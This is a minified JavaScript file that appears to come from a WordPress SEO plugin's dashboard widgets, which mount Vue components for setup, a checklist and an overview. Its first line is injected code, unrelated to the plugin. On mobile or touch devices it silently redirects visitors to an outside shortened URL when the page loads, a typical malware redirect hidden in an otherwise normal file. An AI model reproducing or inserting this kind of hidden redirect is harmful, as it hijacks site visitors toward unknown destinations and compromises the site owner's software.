(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{aq as r,f as s,i as a,a0 as i,M as d,an as h}from"./js/vendor-vue-ui.232c7c36.js";import{l as $}from"./js/index.98d01501.js";import{l as v}from"./js/index.2a5d16ad.js";import{y as f,k as S,l as y}from"./js/app-core.c8323d51.js";import{C as k,_ as C}from"./js/SeoChecklist.9e7e9e1f.js";import{_ as p}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{C as b}from"./js/Overview.b194e7ab.js";import{s as _}from"./js/vendor-lodash.03129cfe.js";import"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/Rocket.a5e8e91b.js";import"./js/SeoChecklistProgressBar.93f4ff5f.js";import"./js/LoadingBar.e2469b36.js";import"./js/DonutChartWithLegend.d28af9c4.js";import"./js/DonutChart.3c36b313.js";import"./js/AnimatedNumber.f33b2226.js";import"./js/Loading.ebdd5660.js";const x={setup(){return{optionsStore:f()}},components:{CoreSeoSetup:k}},W={key:0};function D(o,t,c,n,m,u){const e=r("core-seo-setup");return n.optionsStore.internalOptions.internal?(s(),a("div",W,[i(e,{isWpDashboard:!0})])):d("",!0)}const O=p(x,[["render",D]]),g={setup(){return{optionsStore:f()}},components:{CoreSeoChecklist:C}},A={key:0};function E(o,t,c,n,m,u){const e=r("core-seo-checklist");return n.optionsStore.internalOptions.internal?(s(),a("div",A,[i(e,{isWpDashboard:!0})])):d("",!0)}const L=p(g,[["render",E]]),B={components:{CoreOverview:b}},N={class:"aioseo-app",style:{"background-color":"transparent"}};function P(o,t,c,n,m,u){const e=r("core-overview");return s(),a("div",N,[i(e,{isWpDashboard:!0})])}const M=p(B,[["render",P]]),V=[{id:"aioseo-seo-setup-app",component:O},{id:"aioseo-seo-checklist-app",component:L},{id:"aioseo-overview-app",component:M}],l=o=>{let t=h({...o.component,name:"Standalone/DashboardWidgets"});t=$(t),t=v(t),y(t),t.mount("#"+o.id)};V.forEach(o=>{document.getElementById(o.id)?l(o):(S("#"+o.id,_(o.id)),document.addEventListener("animationstart",function(t){_(o.id)===t.animationName&&l(o)},{passive:!0}))});
